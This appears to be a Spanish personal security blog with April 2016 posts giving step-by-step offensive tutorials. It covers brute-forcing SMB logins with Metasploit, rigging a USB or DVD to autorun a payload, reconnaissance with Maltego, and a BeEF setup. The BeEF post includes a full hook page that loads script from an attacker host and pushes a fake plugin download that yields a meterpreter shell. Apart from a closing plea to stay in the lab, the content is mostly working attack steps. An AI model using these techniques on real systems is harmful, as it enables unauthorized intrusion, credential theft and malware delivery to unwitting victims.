Blog personal de Manuel Antonio Gómez González dedicado a la Seguridad Informática y al Hacking de Sistemas.
viernes, 29 de abril de 2016
viernes, 22 de abril de 2016
Intrusión por netbíos
En primer lugar, vamos a averiguar la
contraseña, eso sí, el sistema víctima tiene que tener NETBIOS activado.
La máquina víctima tendrá la IP
192.168.1.129
En primer lugar iniciamos metasploit y
usamos el módulo auxiliar smb_login:
use auxiliary/scanner/smb/smb_login
configuramos:
set RHOSTS: 192.168.1.129
Si queremos poner un usuario concreto
tendremos que configurar el usuario con SMBUser.
Si queremos poner una contraseña
concreta tendremos que configurar la misma con SMBPass
Si queremos probar que el usuario y la
contraseña son las mismas, lo haríamos con USER_AS_PASS.
En mi caso, tengo un diccionario de
usuarios y otro de contraseñas (un diccionario es un listado de
palabras que irá probando sucesivamente hasta que dé con la que
realmente sea).
set USER_FILE /root/usuarios
set PASS_FILE /root/contraseñas
Bien, pues ya tenemos los usuarios:
Windows7 y la contraseña:1234; usuario y la contraseña usuario.
Abrimos el explorador de archivos y nos
vamos al equipo; introducimos la contraseña y ya tenemos acceso.
viernes, 15 de abril de 2016
Infectar un USB/DVD
En primer lugar, creamos una carpeta
llamada “autorun”.
Creamos un payload (yo voy a usar el
payload que cree en el post de veil) y lo copiamos en esta carpeta.
Editamos el archivo autorun.inf y lo
llenamos como sigue:
[autorun]
open=manugomez1977.exe
icon=autorun.ico
Guardamos y cerramos.
Por supesto que, en open, ponemos el
payload que hayamos creado.
Copiamos el contenido de esta carpeta
en un pen (para insertar un pen en la máquina virtual, lo metemos en
el puerto y seleccionamos Dispositivos → USB → Seleccionamos el
usb a insertar) o bien lo grabamos en un cd – dvd grabable.
Ojo, hay que poner en el directorio
raíz del pen el archivo autorun.inf y el ejecutable, en mi caso
manugomez1977, no más. Así de simple.
Sin embargo, en los pen, no se ejecuta
automáticamente, a la víctima se le abrirá un menú que le
preguntará qué quiere hacer.
En un dvd/cdrom se ejecuta
automáticamente.
viernes, 8 de abril de 2016
Búsqueda de información con Maltego
Maltego es una herramienta para buscar
información sobre un objetivo, podremos ver las referencias en sus
redes sociales, localizaciones, nombres de dominio, etc.
Abrimos maltego:
Siguiente
Rellenamos los campos, si no estáis
registrados, vais a “register here”, vamos a suponer que no
estamos registrados y que nos vamos a registrar, entonces nos saltará
el navegador:
una vez que ya estamos registrados,
ponemos nuestros datos
Le damos siguiente
En principio, no elegimos a ninguna
máquina ahora, así que le damos a la última opción
Ahora ya sí, nos vamos a la pestaña
de las máquinas y elegimos una.
Las máquinas nos van a permitir buscar
según que cosas,
Elegimos la opción “Run Machines”
Os preguntaréis que porqué lo he echo
así. La respuesta es que sepáis otra manera de acceder.
Elegiré la opción:
Le damos a next
Ponemos la url objetivo y le damos a
Finish.
Y empezará a trabajar.
Clickeando en el botón derecho del
gráfico que nos saldrá, podremos ver más opciones.
viernes, 1 de abril de 2016
Beef
Beef es un framework que nos permite
inyecciones XSS, las cuales nos indica la IP, nos da las
características del equipo, lanzar exploits, etc.
En primer lugar, hay que cofigurarlo:
editamos
/usr/share/beef-xss/config.yaml
En metasploit ponemos
enable: true
En evasion ponemos
enable: true
Guardamos y salimos.
Creamos un archivo beef.rc que
contiene:
load msgrpc ServerHost=IPLOCAL
Pass=abc123 (o si habéis cambiado la pass, la que sea).
Msgrpc es un servicio de Metasploit que
le permite conectarse a aplicaciones externas.
Guardamos
Ahora editamos
/usr/share/beef-xss/extensions/metasploit/config.yaml
En la parte de metasploit, en host,
cambiamos 127.0.0.1 por la IP local.
En callback_host, cambiamos 127.0.0.1
por la IP local.
Beef tiene una página web por defecto,
pero nosotros vamos a crear una:
<!doctype html> <HTML lang=es> <head> <title>Los Mejores acertijos</title> </head> <script src="http://192.168.1.134:3000/hook.js"type="text/javascript"</javascript> <script> var commandModuleStr='script src="'+window.location.protocol+'//'+window.location.host+'hook.js" type="text/javascript"><\/script>';document.write(commandModuleStr); </script> <body> <br> Has sido hackeado, te fastidias <br> </body> </html>
La guardaremos e iniciaremos apache
service apache2 start
En el directorio /usr/share/beef-xss,
ponemos
msfconsole -r beef.rc
Y en otra consola
./beef
Abrimos el navegador y ponemos la
dirección:
username: beef
password: beef
Cuando la víctima pone:
Y nosotros ya lo tenemos como zombie:
Por ejemplo, podemos hacerle tragar un
payload con la opción:
La víctima recibirá un mensaje en la que se le dice que tiene que descargar un pluggin, y, en realidad, será un payload que hemos creado. Ambas cosas las tendremos que configurar y darle al botón de ejecutar.
A la víctima le sale:
Y al ejectuarlo, ya tenemos nuestra
sesión de meterpreter:
Otro día echaremos un vistazo a más
cosas que se pueden hacer.
Recordad: Usad esto en vuestro
laboratorio, sed, legales.
Suscribirse a:
Entradas (Atom)